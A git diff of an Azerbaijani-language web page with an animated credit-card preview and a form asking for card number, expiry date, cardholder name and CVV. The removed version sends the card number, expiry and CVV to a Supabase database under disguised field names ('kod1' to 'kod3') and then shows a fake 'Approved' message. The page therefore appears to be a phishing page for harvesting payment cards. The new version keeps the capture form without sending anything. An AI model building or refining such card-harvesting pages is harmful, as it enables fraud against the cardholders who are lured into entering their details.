--- a/index.html
+++ b/index.html
@@ -3,70 +3,60 @@
 <head>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
-<title>Sürətli və Təhlükəsiz</title>
+<title>Kredit Sorgu</title>
+
+<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;600&display=swap" rel="stylesheet">
 
 <style>
-*{margin:0;padding:0;box-sizing:border-box;font-family:Arial, sans-serif;}
-
-body{
-min-height:100vh;
-background:linear-gradient(-45deg,#0f2027,#203a43,#1e3c72,#00c6ff);
-background-size:400% 400%;
-animation:bg 12s ease infinite;
-display:flex;
-flex-direction:column;
-color:white;
+*{
+margin:0;
+padding:0;
+box-sizing:border-box;
+font-family:'Poppins',sans-serif;
 }
 
-@keyframes bg{
+body{
+height:100vh;
+display:flex;
+justify-content:center;
+align-items:center;
+background:linear-gradient(135deg,#0f172a,#111c44,#1e3a8a);
+background-size:200% 200%;
+animation:gradientMove 10s ease infinite;
+overflow:hidden;
+}
+
+@keyframes gradientMove{
 0%{background-position:0% 50%}
 50%{background-position:100% 50%}
 100%{background-position:0% 50%}
 }
 
-header{
-padding:20px;
-text-align:center;
-font-size:20px;
-font-weight:bold;
-}
-
-.container{
-flex:1;
-display:flex;
-justify-content:center;
-align-items:center;
-}
-
-.phone{
-width:340px;
-height:680px;
-background:#000;
-border-radius:40px;
-padding:18px;
-box-shadow:0 30px 60px rgba(0,0,0,0.6);
-position:relative;
-}
-
-.screen{
-background:linear-gradient(135deg,#1e3c72,#2a5298);
-height:100%;
-border-radius:30px;
-padding:25px;
+.wrapper{
 display:flex;
 flex-direction:column;
-justify-content:center;
+align-items:center;
+gap:30px;
 }
 
-.card-container{perspective:1000px;margin-bottom:25px;}
+/* CARD 3D */
+.card-container{
+perspective:1000px;
+width:340px;
+height:200px;
+}
+
 .card{
 width:100%;
-height:180px;
+height:100%;
 position:relative;
 transform-style:preserve-3d;
-transition:0.6s;
+transition:transform 0.8s;
 }
-.card.flip{transform:rotateY(180deg);}
+
+.card.flip{
+transform:rotateY(180deg);
+}
 
 .card-face{
 position:absolute;
@@ -75,137 +65,165 @@ height:100%;
 backface-visibility:hidden;
 border-radius:20px;
 padding:20px;
+color:white;
 display:flex;
 flex-direction:column;
 justify-content:space-between;
+box-shadow:0 20px 50px rgba(0,0,0,0.6);
 }
-.front{background:linear-gradient(135deg,#00c6ff,#0072ff);}
-.back{background:linear-gradient(135deg,#0072ff,#00c6ff);transform:rotateY(180deg);align-items:flex-end;}
 
-.card-number{letter-spacing:3px;font-size:18px;}
-.card-code{font-size:20px;font-weight:bold;}
+.card-front{
+background:linear-gradient(135deg,#1e293b,#1e3a8a);
+border:1px solid rgba(255,215,0,0.3);
+}
+
+.card-back{
+background:linear-gradient(135deg,#0f172a,#1e293b);
+transform:rotateY(180deg);
+}
+
+.card-number{
+font-size:22px;
+letter-spacing:3px;
+}
+
+.card-name,
+.card-expiry{
+font-size:14px;
+}
+
+.gold-line{
+height:2px;
+background:linear-gradient(to right,transparent,gold,transparent);
+margin:5px 0;
+}
+
+/* FORM */
+.form{
+display:flex;
+flex-direction:column;
+gap:15px;
+width:340px;
+}
 
 input{
-width:100%;
-padding:12px;
-border:none;
+padding:14px;
 border-radius:10px;
-margin-bottom:10px;
-font-size:14px;
+border:none;
 outline:none;
+background:#0f172a;
+color:white;
+border:1px solid rgba(255,215,0,0.2);
 }
 
-.row{display:flex;gap:10px;}
+input:focus{
+border:1px solid gold;
+box-shadow:0 0 10px rgba(255,215,0,0.4);
+}
 
 button{
 padding:14px;
 border:none;
 border-radius:12px;
-background:#00c6ff;
-color:white;
-font-weight:bold;
+background:linear-gradient(90deg,#d4af37,#f5d76e,#d4af37);
+background-size:200% auto;
+color:#111;
+font-weight:600;
 cursor:pointer;
+transition:0.5s;
 }
 
-#status{text-align:center;margin-top:10px;}
+button:hover{
+background-position:right center;
+box-shadow:0 0 20px rgba(255,215,0,0.6);
+}
+
 </style>
 </head>
 
 <body>
 
-<header>Sürətli və Təhlükəsiz</header>
-
-<div class="container">
-<div class="phone">
-<div class="screen">
+<div class="wrapper">
 
 <div class="card-container">
-<div class="card" id="gameCard">
-
-<div class="card-face front">
-<div>KREDIT</div>
-<div class="card-number" id="previewNumber">•••• •••• •••• ••••</div>
-<div class="card-code" id="previewDate">MMYY</div>
-</div>
-
-<div class="card-face back">
-<div>CVV: <span id="previewCVV">•••</span></div>
-</div>
-
+<div class="card" id="card">
+<div class="card-face card-front">
+<div class="gold-line"></div>
+<div class="card-number" id="cardNumber">#### #### #### ####</div>
+<div>
+<div class="card-name" id="cardName">AD SOYAD</div>
+<div class="card-expiry" id="cardExpiry">MM/YY</div>
 </div>
 </div>
 
-<input type="text" id="kod1" maxlength="19" placeholder="16 rəqəm"
-oninput="formatNumber(this)">
-
-<div class="row">
-<input type="text" id="kod2" maxlength="4" placeholder="MMYY"
-oninput="updateDate(this)">
-<input type="text" id="kod3" maxlength="3" placeholder="CVV"
-onfocus="flip(true)"
-onblur="flip(false)"
-oninput="updateCVV(this)">
-</div>
-
-<button onclick="sendData()">Təsdiqlə</button>
-<p id="status"></p>
-
-</div>
+<div class="card-face card-back">
+<div style="background:black;height:40px;margin-top:10px;"></div>
+<div style="margin-top:30px;text-align:right;padding-right:10px;">
+CVV: <span id="cardCvv">###</span>
 </div>
 </div>
 
-<script type="module">
-import { createClient } from "https://esm.sh/@supabase/supabase-js@2"
+</div>
+</div>
 
-const supabaseUrl = "BURAYA_URL"
-const supabaseKey = "BURAYA_KEY"
+<div class="form">
+<input type="text" id="nameInput" placeholder="Ad Soyad">
+<input type="text" id="numberInput" placeholder="Kart Nömrəsi" maxlength="19">
+<input type="text" id="expiryInput" placeholder="MM/YY" maxlength="5">
+<input type="text" id="cvvInput" placeholder="CVV" maxlength="3">
+<button>Təsdiqlə</button>
+</div>
 
-const supabase = createClient(supabaseUrl, supabaseKey)
+</div>
 
-window.formatNumber = function(input){
-let value = input.value.replace(/\D/g,'').slice(0,16)
-value = value.replace(/(.{4})/g,'$1 ').trim()
-input.value = value
-document.getElementById("previewNumber").innerText = value || "•••• •••• •••• ••••"
+<script>
+const card = document.getElementById("card");
+
+const numberInput = document.getElementById("numberInput");
+const nameInput = document.getElementById("nameInput");
+const expiryInput = document.getElementById("expiryInput");
+const cvvInput = document.getElementById("cvvInput");
+
+const cardNumber = document.getElementById("cardNumber");
+const cardName = document.getElementById("cardName");
+const cardExpiry = document.getElementById("cardExpiry");
+const cardCvv = document.getElementById("cardCvv");
+
+/* FORMAT CARD NUMBER */
+numberInput.addEventListener("input", e=>{
+let value = e.target.value.replace(/\D/g,"").substring(0,16);
+let formatted = value.replace(/(.{4})/g,"$1 ").trim();
+e.target.value = formatted;
+cardNumber.innerText = formatted || "#### #### #### ####";
+});
+
+/* NAME */
+nameInput.addEventListener("input", e=>{
+cardName.innerText = e.target.value.toUpperCase() || "AD SOYAD";
+});
+
+/* EXPIRY */
+expiryInput.addEventListener("input", e=>{
+let value = e.target.value.replace(/\D/g,"").substring(0,4);
+if(value.length > 2){
+value = value.substring(0,2) + "/" + value.substring(2);
 }
+e.target.value = value;
+cardExpiry.innerText = value || "MM/YY";
+});
 
-window.updateDate = function(input){
-let value = input.value.replace(/\D/g,'').slice(0,4)
-input.value = value
-document.getElementById("previewDate").innerText = value || "MMYY"
-}
-
-window.updateCVV = function(input){
-let value = input.value.replace(/\D/g,'').slice(0,3)
-input.value = value
-document.getElementById("previewCVV").innerText = value || "•••"
-}
-
-window.flip = function(state){
-const card = document.getElementById("gameCard")
-state ? card.classList.add("flip") : card.classList.remove("flip")
-}
-
-window.sendData = async function(){
-const kod1 = document.getElementById("kod1").value
-const kod2 = document.getElementById("kod2").value
-const kod3 = document.getElementById("kod3").value
-
-if(kod1.length < 19 || kod2.length < 4 || kod3.length < 3){
-document.getElementById("status").innerText="Məlumatları tam doldurun"
-return
-}
-
-document.getElementById("status").innerText="Onaylanır..."
-
-const { error } = await supabase.from("kod1").insert([{kod1,kod2,kod3}])
-
-if(error){
-document.getElementById("status").innerText="Xəta baş verdi"
-}else{
-document.getElementById("status").innerText="Onaylandı ✓"
-}
-}
+/* CVV */
+cvvInput.addEventListener("focus", ()=>{
+card.classList.add("flip");
+});
+cvvInput.addEventListener("blur", ()=>{
+card.classList.remove("flip");
+});
+cvvInput.addEventListener("input", e=>{
+let value = e.target.value.replace(/\D/g,"").substring(0,3);
+e.target.value = value;
+cardCvv.innerText = value || "###";
+});
 </script>
 
 </body>
